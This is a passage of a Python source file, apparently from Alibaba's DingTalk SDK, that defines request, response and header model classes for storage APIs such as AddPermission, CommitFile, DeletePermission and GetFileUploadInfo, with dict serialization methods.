] | permissive | aliyun/dingtalk-sdk | f2362b6963c4dbacd82a83eeebc223c21f143beb | 586874df48466d968adf0441b3086a2841892935 | refs/heads/master | 2023-08-31T08:21:14.042410 | 2023-08-30T08:18:22 | 2023-08-30T08:18:22 | 290,671,707 | 22 | 9 | null | 2021-08-12T09:55:44 | 2020-08-27T04:05:39 | PHP | UTF-8 | Python | false | false | 89,290 | py | # -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from Tea.model import TeaModel
from typing import Dict, List
class DentryAppPropertiesValue(TeaModel):
    """One app-scoped custom property on a dentry (name, value, visibility)."""

    # Wire-key / attribute pairs used for (de)serialization below.
    _FIELDS = (
        ('name', 'name'),
        ('value', 'value'),
        ('visibility', 'visibility'),
    )

    def __init__(
        self,
        name: str = None,
        value: str = None,
        visibility: str = None,
    ):
        self.name = name
        self.value = value
        self.visibility = visibility

    def validate(self):
        # No nested models to validate.
        pass

    def to_map(self):
        """Serialize this model to a dict, omitting unset (None) fields."""
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        for wire_key, attr_name in self._FIELDS:
            attr_value = getattr(self, attr_name)
            if attr_value is not None:
                result[wire_key] = attr_value
        return result

    def from_map(self, m: dict = None):
        """Populate this model from a dict, ignoring missing/None keys."""
        m = m or dict()
        for wire_key, attr_name in self._FIELDS:
            if m.get(wire_key) is not None:
                setattr(self, attr_name, m.get(wire_key))
        return self
class AddPermissionHeaders(TeaModel):
    """Request headers for the AddPermission API (common headers + token)."""

    # Wire-key / attribute pairs used for (de)serialization below.
    _FIELDS = (
        ('commonHeaders', 'common_headers'),
        ('x-acs-dingtalk-access-token', 'x_acs_dingtalk_access_token'),
    )

    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        # No nested models to validate.
        pass

    def to_map(self):
        """Serialize this model to a dict, omitting unset (None) fields."""
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        for wire_key, attr_name in self._FIELDS:
            attr_value = getattr(self, attr_name)
            if attr_value is not None:
                result[wire_key] = attr_value
        return result

    def from_map(self, m: dict = None):
        """Populate this model from a dict, ignoring missing/None keys."""
        m = m or dict()
        for wire_key, attr_name in self._FIELDS:
            if m.get(wire_key) is not None:
                setattr(self, attr_name, m.get(wire_key))
        return self
class AddPermissionRequestMembers(TeaModel):
    """One member (grantee) in an AddPermission request."""

    # Wire-key / attribute pairs used for (de)serialization below.
    _FIELDS = (
        ('corpId', 'corp_id'),
        ('id', 'id'),
        ('type', 'type'),
    )

    def __init__(
        self,
        corp_id: str = None,
        id: str = None,
        type: str = None,
    ):
        self.corp_id = corp_id
        self.id = id
        self.type = type

    def validate(self):
        # No nested models to validate.
        pass

    def to_map(self):
        """Serialize this model to a dict, omitting unset (None) fields."""
        _map = super().to_map()
        if _map is not None:
            return _map

        result = dict()
        for wire_key, attr_name in self._FIELDS:
            attr_value = getattr(self, attr_name)
            if attr_value is not None:
                result[wire_key] = attr_value
        return result

    def from_map(self, m: dict = None):
        """Populate this model from a dict, ignoring missing/None keys."""
        m = m or dict()
        for wire_key, attr_name in self._FIELDS:
            if m.get(wire_key) is not None:
                setattr(self, attr_name, m.get(wire_key))
        return self
class AddPermissionRequestOption(TeaModel):
    """Optional settings for AddPermission; carries a grant duration
    (units not visible here — presumably seconds, confirm with the API docs)."""
    def __init__(
        self,
        duration: int = None,
    ):
        self.duration = duration
    def validate(self):
        pass
    def to_map(self):
        """Serialize to a dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.duration is not None:
            result['duration'] = self.duration
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a dict; return self."""
        m = m or dict()
        if m.get('duration') is not None:
            self.duration = m.get('duration')
        return self
class AddPermissionRequest(TeaModel):
    """Request body for AddPermission: the members to grant, optional
    settings, the role to grant, and the operator's unionId."""
    def __init__(
        self,
        members: List[AddPermissionRequestMembers] = None,
        option: AddPermissionRequestOption = None,
        role_id: str = None,
        union_id: str = None,
    ):
        self.members = members
        self.option = option
        self.role_id = role_id
        self.union_id = union_id
    def validate(self):
        """Recursively validate nested members and option models."""
        if self.members:
            for k in self.members:
                if k:
                    k.validate()
        if self.option:
            self.option.validate()
    def to_map(self):
        """Serialize to a camelCase-keyed dict, omitting unset scalar fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        # NOTE: 'members' is always emitted (possibly as []) even when unset —
        # generated behavior, preserved as-is.
        result['members'] = []
        if self.members is not None:
            for k in self.members:
                result['members'].append(k.to_map() if k else None)
        if self.option is not None:
            result['option'] = self.option.to_map()
        if self.role_id is not None:
            result['roleId'] = self.role_id
        if self.union_id is not None:
            result['unionId'] = self.union_id
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a camelCase-keyed dict; return self."""
        m = m or dict()
        # members is reset to [] unconditionally before repopulating.
        self.members = []
        if m.get('members') is not None:
            for k in m.get('members'):
                temp_model = AddPermissionRequestMembers()
                self.members.append(temp_model.from_map(k))
        if m.get('option') is not None:
            temp_model = AddPermissionRequestOption()
            self.option = temp_model.from_map(m['option'])
        if m.get('roleId') is not None:
            self.role_id = m.get('roleId')
        if m.get('unionId') is not None:
            self.union_id = m.get('unionId')
        return self
class AddPermissionResponseBody(TeaModel):
    """Response body for AddPermission: a single success flag."""
    def __init__(
        self,
        success: bool = None,
    ):
        self.success = success
    def validate(self):
        pass
    def to_map(self):
        """Serialize to a dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.success is not None:
            result['success'] = self.success
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a dict; return self."""
        m = m or dict()
        if m.get('success') is not None:
            self.success = m.get('success')
        return self
class AddPermissionResponse(TeaModel):
    """Full AddPermission HTTP response: headers, status code, and parsed body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        status_code: int = None,
        body: AddPermissionResponseBody = None,
    ):
        self.headers = headers
        self.status_code = status_code
        self.body = body
    def validate(self):
        """Require headers/status_code/body and validate the nested body."""
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.status_code, 'status_code')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        """Serialize to a camelCase-keyed dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.status_code is not None:
            result['statusCode'] = self.status_code
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a camelCase-keyed dict; return self."""
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('statusCode') is not None:
            self.status_code = m.get('statusCode')
        if m.get('body') is not None:
            temp_model = AddPermissionResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self
class CommitFileHeaders(TeaModel):
    """Request headers for the CommitFile API: common headers plus the
    DingTalk access token."""
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
    def validate(self):
        pass
    def to_map(self):
        """Serialize to a dict keyed by wire header names, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a dict keyed by wire header names; return self."""
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self
class CommitFileRequestOptionAppProperties(TeaModel):
    """An app-scoped custom property (name, value, visibility) to attach to
    the committed file."""
    def __init__(
        self,
        name: str = None,
        value: str = None,
        visibility: str = None,
    ):
        self.name = name
        self.value = value
        self.visibility = visibility
    def validate(self):
        pass
    def to_map(self):
        """Serialize to a dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.name is not None:
            result['name'] = self.name
        if self.value is not None:
            result['value'] = self.value
        if self.visibility is not None:
            result['visibility'] = self.visibility
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a dict; return self."""
        m = m or dict()
        if m.get('name') is not None:
            self.name = m.get('name')
        if m.get('value') is not None:
            self.value = m.get('value')
        if m.get('visibility') is not None:
            self.visibility = m.get('visibility')
        return self
class CommitFileRequestOption(TeaModel):
    """Optional settings for CommitFile: custom app properties, conflict
    strategy, online-doc conversion flags, and expected file size."""
    def __init__(
        self,
        app_properties: List[CommitFileRequestOptionAppProperties] = None,
        conflict_strategy: str = None,
        convert_to_online_doc: bool = None,
        convert_to_online_doc_target_document_type: str = None,
        size: int = None,
    ):
        self.app_properties = app_properties
        self.conflict_strategy = conflict_strategy
        self.convert_to_online_doc = convert_to_online_doc
        self.convert_to_online_doc_target_document_type = convert_to_online_doc_target_document_type
        self.size = size
    def validate(self):
        """Recursively validate nested app-property models."""
        if self.app_properties:
            for k in self.app_properties:
                if k:
                    k.validate()
    def to_map(self):
        """Serialize to a camelCase-keyed dict, omitting unset scalar fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        # NOTE: 'appProperties' is always emitted (possibly as []) even when
        # unset — generated behavior, preserved as-is.
        result['appProperties'] = []
        if self.app_properties is not None:
            for k in self.app_properties:
                result['appProperties'].append(k.to_map() if k else None)
        if self.conflict_strategy is not None:
            result['conflictStrategy'] = self.conflict_strategy
        if self.convert_to_online_doc is not None:
            result['convertToOnlineDoc'] = self.convert_to_online_doc
        if self.convert_to_online_doc_target_document_type is not None:
            result['convertToOnlineDocTargetDocumentType'] = self.convert_to_online_doc_target_document_type
        if self.size is not None:
            result['size'] = self.size
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a camelCase-keyed dict; return self."""
        m = m or dict()
        self.app_properties = []
        if m.get('appProperties') is not None:
            for k in m.get('appProperties'):
                temp_model = CommitFileRequestOptionAppProperties()
                self.app_properties.append(temp_model.from_map(k))
        if m.get('conflictStrategy') is not None:
            self.conflict_strategy = m.get('conflictStrategy')
        if m.get('convertToOnlineDoc') is not None:
            self.convert_to_online_doc = m.get('convertToOnlineDoc')
        if m.get('convertToOnlineDocTargetDocumentType') is not None:
            self.convert_to_online_doc_target_document_type = m.get('convertToOnlineDocTargetDocumentType')
        if m.get('size') is not None:
            self.size = m.get('size')
        return self
class CommitFileRequest(TeaModel):
    """Request body for CommitFile: file name, commit options, the upload key
    returned by GetFileUploadInfo, and the operator's unionId."""
    def __init__(
        self,
        name: str = None,
        option: CommitFileRequestOption = None,
        upload_key: str = None,
        union_id: str = None,
    ):
        self.name = name
        self.option = option
        self.upload_key = upload_key
        self.union_id = union_id
    def validate(self):
        """Validate the nested option model if present."""
        if self.option:
            self.option.validate()
    def to_map(self):
        """Serialize to a camelCase-keyed dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.name is not None:
            result['name'] = self.name
        if self.option is not None:
            result['option'] = self.option.to_map()
        if self.upload_key is not None:
            result['uploadKey'] = self.upload_key
        if self.union_id is not None:
            result['unionId'] = self.union_id
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a camelCase-keyed dict; return self."""
        m = m or dict()
        if m.get('name') is not None:
            self.name = m.get('name')
        if m.get('option') is not None:
            temp_model = CommitFileRequestOption()
            self.option = temp_model.from_map(m['option'])
        if m.get('uploadKey') is not None:
            self.upload_key = m.get('uploadKey')
        if m.get('unionId') is not None:
            self.union_id = m.get('unionId')
        return self
class CommitFileResponseBodyDentryProperties(TeaModel):
    """Dentry properties returned by CommitFile: currently just a read-only flag."""
    def __init__(
        self,
        read_only: bool = None,
    ):
        self.read_only = read_only
    def validate(self):
        pass
    def to_map(self):
        """Serialize to a dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.read_only is not None:
            result['readOnly'] = self.read_only
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a dict; return self."""
        m = m or dict()
        if m.get('readOnly') is not None:
            self.read_only = m.get('readOnly')
        return self
class CommitFileResponseBodyDentryThumbnail(TeaModel):
    """Thumbnail info for a committed dentry: height, URL, and width."""
    def __init__(
        self,
        height: int = None,
        url: str = None,
        width: int = None,
    ):
        self.height = height
        self.url = url
        self.width = width
    def validate(self):
        pass
    def to_map(self):
        """Serialize to a dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.height is not None:
            result['height'] = self.height
        if self.url is not None:
            result['url'] = self.url
        if self.width is not None:
            result['width'] = self.width
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a dict; return self."""
        m = m or dict()
        if m.get('height') is not None:
            self.height = m.get('height')
        if m.get('url') is not None:
            self.url = m.get('url')
        if m.get('width') is not None:
            self.width = m.get('width')
        return self
class CommitFileResponseBodyDentry(TeaModel):
    """The dentry (file/folder entry) returned by CommitFile: identity,
    timestamps, hierarchy, storage info, app-scoped properties, and an
    optional thumbnail.

    Bug fix vs. the generated code: ``from_map`` previously stored every
    ``appProperties`` entry under the literal string key ``'k'``
    (``self.app_properties['k'] = l1``), collapsing the whole map to a
    single entry and losing the real keys. It now keys by the actual
    map key ``k``.
    """
    def __init__(
        self,
        app_properties: Dict[str, List[DentryAppPropertiesValue]] = None,
        category: str = None,
        create_time: str = None,
        creator_id: str = None,
        extension: str = None,
        id: str = None,
        modified_time: str = None,
        modifier_id: str = None,
        name: str = None,
        parent_id: str = None,
        partition_type: str = None,
        path: str = None,
        properties: CommitFileResponseBodyDentryProperties = None,
        size: int = None,
        space_id: str = None,
        status: str = None,
        storage_driver: str = None,
        thumbnail: CommitFileResponseBodyDentryThumbnail = None,
        type: str = None,
        uuid: str = None,
        version: int = None,
    ):
        self.app_properties = app_properties
        self.category = category
        self.create_time = create_time
        self.creator_id = creator_id
        self.extension = extension
        self.id = id
        self.modified_time = modified_time
        self.modifier_id = modifier_id
        self.name = name
        self.parent_id = parent_id
        self.partition_type = partition_type
        self.path = path
        self.properties = properties
        self.size = size
        self.space_id = space_id
        self.status = status
        self.storage_driver = storage_driver
        self.thumbnail = thumbnail
        self.type = type
        self.uuid = uuid
        self.version = version
    def validate(self):
        """Recursively validate nested app-property, properties, and thumbnail models."""
        if self.app_properties:
            for v in self.app_properties.values():
                for k1 in v:
                    if k1:
                        k1.validate()
        if self.properties:
            self.properties.validate()
        if self.thumbnail:
            self.thumbnail.validate()
    def to_map(self):
        """Serialize to a camelCase-keyed dict, omitting unset scalar fields.

        NOTE: 'appProperties' is always emitted (possibly as {}) even when
        unset — generated behavior, preserved as-is.
        """
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        result['appProperties'] = {}
        if self.app_properties is not None:
            for k, v in self.app_properties.items():
                l1 = []
                for k1 in v:
                    l1.append(k1.to_map() if k1 else None)
                result['appProperties'][k] = l1
        if self.category is not None:
            result['category'] = self.category
        if self.create_time is not None:
            result['createTime'] = self.create_time
        if self.creator_id is not None:
            result['creatorId'] = self.creator_id
        if self.extension is not None:
            result['extension'] = self.extension
        if self.id is not None:
            result['id'] = self.id
        if self.modified_time is not None:
            result['modifiedTime'] = self.modified_time
        if self.modifier_id is not None:
            result['modifierId'] = self.modifier_id
        if self.name is not None:
            result['name'] = self.name
        if self.parent_id is not None:
            result['parentId'] = self.parent_id
        if self.partition_type is not None:
            result['partitionType'] = self.partition_type
        if self.path is not None:
            result['path'] = self.path
        if self.properties is not None:
            result['properties'] = self.properties.to_map()
        if self.size is not None:
            result['size'] = self.size
        if self.space_id is not None:
            result['spaceId'] = self.space_id
        if self.status is not None:
            result['status'] = self.status
        if self.storage_driver is not None:
            result['storageDriver'] = self.storage_driver
        if self.thumbnail is not None:
            result['thumbnail'] = self.thumbnail.to_map()
        if self.type is not None:
            result['type'] = self.type
        if self.uuid is not None:
            result['uuid'] = self.uuid
        if self.version is not None:
            result['version'] = self.version
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a camelCase-keyed dict; return self."""
        m = m or dict()
        self.app_properties = {}
        if m.get('appProperties') is not None:
            for k, v in m.get('appProperties').items():
                l1 = []
                for k1 in v:
                    temp_model = DentryAppPropertiesValue()
                    l1.append(temp_model.from_map(k1))
                # Fixed: key by the actual map key `k` (the generated code used
                # the literal string 'k', which overwrote every entry).
                self.app_properties[k] = l1
        if m.get('category') is not None:
            self.category = m.get('category')
        if m.get('createTime') is not None:
            self.create_time = m.get('createTime')
        if m.get('creatorId') is not None:
            self.creator_id = m.get('creatorId')
        if m.get('extension') is not None:
            self.extension = m.get('extension')
        if m.get('id') is not None:
            self.id = m.get('id')
        if m.get('modifiedTime') is not None:
            self.modified_time = m.get('modifiedTime')
        if m.get('modifierId') is not None:
            self.modifier_id = m.get('modifierId')
        if m.get('name') is not None:
            self.name = m.get('name')
        if m.get('parentId') is not None:
            self.parent_id = m.get('parentId')
        if m.get('partitionType') is not None:
            self.partition_type = m.get('partitionType')
        if m.get('path') is not None:
            self.path = m.get('path')
        if m.get('properties') is not None:
            temp_model = CommitFileResponseBodyDentryProperties()
            self.properties = temp_model.from_map(m['properties'])
        if m.get('size') is not None:
            self.size = m.get('size')
        if m.get('spaceId') is not None:
            self.space_id = m.get('spaceId')
        if m.get('status') is not None:
            self.status = m.get('status')
        if m.get('storageDriver') is not None:
            self.storage_driver = m.get('storageDriver')
        if m.get('thumbnail') is not None:
            temp_model = CommitFileResponseBodyDentryThumbnail()
            self.thumbnail = temp_model.from_map(m['thumbnail'])
        if m.get('type') is not None:
            self.type = m.get('type')
        if m.get('uuid') is not None:
            self.uuid = m.get('uuid')
        if m.get('version') is not None:
            self.version = m.get('version')
        return self
class CommitFileResponseBody(TeaModel):
    """Response body for CommitFile: the created/updated dentry."""
    def __init__(
        self,
        dentry: CommitFileResponseBodyDentry = None,
    ):
        self.dentry = dentry
    def validate(self):
        """Validate the nested dentry model if present."""
        if self.dentry:
            self.dentry.validate()
    def to_map(self):
        """Serialize to a dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.dentry is not None:
            result['dentry'] = self.dentry.to_map()
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a dict; return self."""
        m = m or dict()
        if m.get('dentry') is not None:
            temp_model = CommitFileResponseBodyDentry()
            self.dentry = temp_model.from_map(m['dentry'])
        return self
class CommitFileResponse(TeaModel):
    """Full CommitFile HTTP response: headers, status code, and parsed body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        status_code: int = None,
        body: CommitFileResponseBody = None,
    ):
        self.headers = headers
        self.status_code = status_code
        self.body = body
    def validate(self):
        """Require headers/status_code/body and validate the nested body."""
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.status_code, 'status_code')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        """Serialize to a camelCase-keyed dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.status_code is not None:
            result['statusCode'] = self.status_code
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a camelCase-keyed dict; return self."""
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('statusCode') is not None:
            self.status_code = m.get('statusCode')
        if m.get('body') is not None:
            temp_model = CommitFileResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self
class DeletePermissionHeaders(TeaModel):
    """Request headers for the DeletePermission API: common headers plus the
    DingTalk access token."""
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
    def validate(self):
        pass
    def to_map(self):
        """Serialize to a dict keyed by wire header names, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a dict keyed by wire header names; return self."""
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self
class DeletePermissionRequestMembers(TeaModel):
    """A member entry (corpId, id, type) whose permission role is to be
    removed in a DeletePermission request."""
    def __init__(
        self,
        corp_id: str = None,
        id: str = None,
        type: str = None,
    ):
        self.corp_id = corp_id
        self.id = id
        self.type = type
    def validate(self):
        pass
    def to_map(self):
        """Serialize to a camelCase-keyed dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.corp_id is not None:
            result['corpId'] = self.corp_id
        if self.id is not None:
            result['id'] = self.id
        if self.type is not None:
            result['type'] = self.type
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a camelCase-keyed dict; return self."""
        m = m or dict()
        if m.get('corpId') is not None:
            self.corp_id = m.get('corpId')
        if m.get('id') is not None:
            self.id = m.get('id')
        if m.get('type') is not None:
            self.type = m.get('type')
        return self
class DeletePermissionRequest(TeaModel):
    """Request body for DeletePermission: the members to revoke, the role to
    revoke, and the operator's unionId."""
    def __init__(
        self,
        members: List[DeletePermissionRequestMembers] = None,
        role_id: str = None,
        union_id: str = None,
    ):
        self.members = members
        self.role_id = role_id
        self.union_id = union_id
    def validate(self):
        """Recursively validate nested member models."""
        if self.members:
            for k in self.members:
                if k:
                    k.validate()
    def to_map(self):
        """Serialize to a camelCase-keyed dict, omitting unset scalar fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        # NOTE: 'members' is always emitted (possibly as []) even when unset —
        # generated behavior, preserved as-is.
        result['members'] = []
        if self.members is not None:
            for k in self.members:
                result['members'].append(k.to_map() if k else None)
        if self.role_id is not None:
            result['roleId'] = self.role_id
        if self.union_id is not None:
            result['unionId'] = self.union_id
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a camelCase-keyed dict; return self."""
        m = m or dict()
        self.members = []
        if m.get('members') is not None:
            for k in m.get('members'):
                temp_model = DeletePermissionRequestMembers()
                self.members.append(temp_model.from_map(k))
        if m.get('roleId') is not None:
            self.role_id = m.get('roleId')
        if m.get('unionId') is not None:
            self.union_id = m.get('unionId')
        return self
class DeletePermissionResponseBody(TeaModel):
    """Response body for DeletePermission: a single success flag."""
    def __init__(
        self,
        success: bool = None,
    ):
        self.success = success
    def validate(self):
        pass
    def to_map(self):
        """Serialize to a dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.success is not None:
            result['success'] = self.success
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a dict; return self."""
        m = m or dict()
        if m.get('success') is not None:
            self.success = m.get('success')
        return self
class DeletePermissionResponse(TeaModel):
    """Full DeletePermission HTTP response: headers, status code, and parsed body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        status_code: int = None,
        body: DeletePermissionResponseBody = None,
    ):
        self.headers = headers
        self.status_code = status_code
        self.body = body
    def validate(self):
        """Require headers/status_code/body and validate the nested body."""
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.status_code, 'status_code')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        """Serialize to a camelCase-keyed dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.status_code is not None:
            result['statusCode'] = self.status_code
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a camelCase-keyed dict; return self."""
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('statusCode') is not None:
            self.status_code = m.get('statusCode')
        if m.get('body') is not None:
            temp_model = DeletePermissionResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self
class GetFileUploadInfoHeaders(TeaModel):
    """Request headers for the GetFileUploadInfo API: common headers plus the
    DingTalk access token."""
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
    def validate(self):
        pass
    def to_map(self):
        """Serialize to a dict keyed by wire header names, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a dict keyed by wire header names; return self."""
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self
class GetFileUploadInfoRequestOptionPreCheckParam(TeaModel):
    """Pre-check parameters for an upload: intended file name and size."""
    def __init__(
        self,
        name: str = None,
        size: int = None,
    ):
        self.name = name
        self.size = size
    def validate(self):
        pass
    def to_map(self):
        """Serialize to a dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.name is not None:
            result['name'] = self.name
        if self.size is not None:
            result['size'] = self.size
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a dict; return self."""
        m = m or dict()
        if m.get('name') is not None:
            self.name = m.get('name')
        if m.get('size') is not None:
            self.size = m.get('size')
        return self
class GetFileUploadInfoRequestOption(TeaModel):
    """Optional settings for GetFileUploadInfo: pre-check parameters and
    intranet/region/storage-driver preferences."""
    def __init__(
        self,
        pre_check_param: GetFileUploadInfoRequestOptionPreCheckParam = None,
        prefer_intranet: bool = None,
        prefer_region: str = None,
        storage_driver: str = None,
    ):
        self.pre_check_param = pre_check_param
        self.prefer_intranet = prefer_intranet
        self.prefer_region = prefer_region
        self.storage_driver = storage_driver
    def validate(self):
        """Validate the nested pre-check model if present."""
        if self.pre_check_param:
            self.pre_check_param.validate()
    def to_map(self):
        """Serialize to a camelCase-keyed dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.pre_check_param is not None:
            result['preCheckParam'] = self.pre_check_param.to_map()
        if self.prefer_intranet is not None:
            result['preferIntranet'] = self.prefer_intranet
        if self.prefer_region is not None:
            result['preferRegion'] = self.prefer_region
        if self.storage_driver is not None:
            result['storageDriver'] = self.storage_driver
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a camelCase-keyed dict; return self."""
        m = m or dict()
        if m.get('preCheckParam') is not None:
            temp_model = GetFileUploadInfoRequestOptionPreCheckParam()
            self.pre_check_param = temp_model.from_map(m['preCheckParam'])
        if m.get('preferIntranet') is not None:
            self.prefer_intranet = m.get('preferIntranet')
        if m.get('preferRegion') is not None:
            self.prefer_region = m.get('preferRegion')
        if m.get('storageDriver') is not None:
            self.storage_driver = m.get('storageDriver')
        return self
class GetFileUploadInfoRequest(TeaModel):
    """Request body for GetFileUploadInfo: options, upload protocol, and the
    operator's unionId."""
    def __init__(
        self,
        option: GetFileUploadInfoRequestOption = None,
        protocol: str = None,
        union_id: str = None,
    ):
        self.option = option
        self.protocol = protocol
        self.union_id = union_id
    def validate(self):
        """Validate the nested option model if present."""
        if self.option:
            self.option.validate()
    def to_map(self):
        """Serialize to a camelCase-keyed dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.option is not None:
            result['option'] = self.option.to_map()
        if self.protocol is not None:
            result['protocol'] = self.protocol
        if self.union_id is not None:
            result['unionId'] = self.union_id
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a camelCase-keyed dict; return self."""
        m = m or dict()
        if m.get('option') is not None:
            temp_model = GetFileUploadInfoRequestOption()
            self.option = temp_model.from_map(m['option'])
        if m.get('protocol') is not None:
            self.protocol = m.get('protocol')
        if m.get('unionId') is not None:
            self.union_id = m.get('unionId')
        return self
class GetFileUploadInfoResponseBodyHeaderSignatureInfo(TeaModel):
    """Header-signature upload info: signature expiry, the headers to send,
    internal/public resource URLs, and the storage region."""
    def __init__(
        self,
        expiration_seconds: int = None,
        headers: Dict[str, str] = None,
        internal_resource_urls: List[str] = None,
        region: str = None,
        resource_urls: List[str] = None,
    ):
        self.expiration_seconds = expiration_seconds
        self.headers = headers
        self.internal_resource_urls = internal_resource_urls
        self.region = region
        self.resource_urls = resource_urls
    def validate(self):
        pass
    def to_map(self):
        """Serialize to a camelCase-keyed dict, omitting unset fields."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.expiration_seconds is not None:
            result['expirationSeconds'] = self.expiration_seconds
        if self.headers is not None:
            result['headers'] = self.headers
        if self.internal_resource_urls is not None:
            result['internalResourceUrls'] = self.internal_resource_urls
        if self.region is not None:
            result['region'] = self.region
        if self.resource_urls is not None:
            result['resourceUrls'] = self.resource_urls
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a camelCase-keyed dict; return self."""
        m = m or dict()
        if m.get('expirationSeconds') is not None:
            self.expiration_seconds = m.get('expirationSeconds')
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('internalResourceUrls') is not None:
